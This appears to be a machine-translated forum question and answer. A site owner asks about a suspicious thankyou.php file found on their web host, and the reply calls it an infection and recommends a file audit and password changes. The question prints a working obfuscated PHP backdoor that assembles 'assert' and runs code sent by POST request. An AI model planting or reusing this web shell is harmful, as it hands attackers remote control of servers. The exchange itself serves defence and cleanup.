我正在将文件上传到我的网络托管,并注意到出现了一个名为thankyou.php的文件。我不记得以前见过这个文件或这段代码。令人震惊的是,该文件以及我的favicon在我进行更改后四个小时的最后修改时间。 你能告诉我下面的代码是否含义吗?注意每行最后一个字符后面的空格。自从我涉猎php之后已经很久了,这只是一个涉猎。
<?php
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>
答案 0 :(得分:1)
这只能是您文件中的感染。这可能不是唯一的。您可以做的最好的事情是检查所有关于此类感染的文件。
如果您已经这样做,请更改所有密码,如FTP和数据库。
无论您做什么,在检查文件之前都不要更改密码。他们可能已经做了一些事情来改变你的密码(主要是PHP)。